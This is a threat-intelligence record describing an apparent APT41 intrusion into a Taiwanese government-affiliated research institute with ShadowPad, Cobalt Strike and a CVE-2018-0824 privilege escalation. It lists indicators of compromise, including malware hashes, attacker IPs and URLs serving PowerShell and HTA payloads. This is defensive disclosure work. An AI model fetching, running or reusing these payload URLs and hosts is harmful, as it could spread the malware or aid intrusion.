Likely compromise of Taiwanese government-affiliated research institute with ShadowPad and Cobalt Strike

Aug. 2, 2024, 8:31 a.m.

Description

A government-affiliated Taiwanese research institute specializing in computing technologies experienced a cyber intrusion likely carried out by the Chinese hacking group APT41. The attackers employed ShadowPad malware, Cobalt Strike, and custom tools, exploiting vulnerabilities like CVE-2018-0824 for privilege escalation. They gathered information, deployed backdoors, harvested credentials, and exfiltrated data. Evidence suggests the threat actor spoke Chinese and followed open-source anti-detection techniques.

External References

https://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/
https://otx.alienvault.com/pulse/66ac979d1b6ab8ceedf67871
Tags
apt
cobalt strike
credential theft
cobaltstrike
shadowpad
data exfiltration
2024-08-02
poisonplug.shadow
CVE-2018-0824
unmarshalpwn

Date

  • Created: Aug. 2, 2024, 8:23 a.m.
  • Published: Aug. 2, 2024, 8:23 a.m.
  • Modified: Aug. 2, 2024, 8:31 a.m.

Indicators

  • eba3138d0f3d2385b55b08d8886b1018834d194440691d33d612402ba8a11d28
  • 2e46fcadacfe9e2a63cfc18d95d5870de8b3414462bf14ba9e7c517678f235c9
  • 58.64.204.145
  • 45.85.76.18
  • 103.96.131.84
  • 103.56.114.69
  • www.nss.com.tw
  • https://www.nss.com.tw/calc.exe'
  • http://www.nss.com.tw/p.ps1'
  • http://www.nss.com.tw/1.hta
  • http://45.85.76.18:443/yPc1
  • http://103.56.114.69:8085/p.ps1'
  • w2.chatgptsfit.com

Attack Patterns

  • UnmarshalPwn
  • POISONPLUG.SHADOW
  • ShadowPad - S0596
  • Cobalt Strike - S0154
  • APT41

Additional Informations

  • Taiwan

Linked vulnerabilities

CVE-2018-0824

None
Published: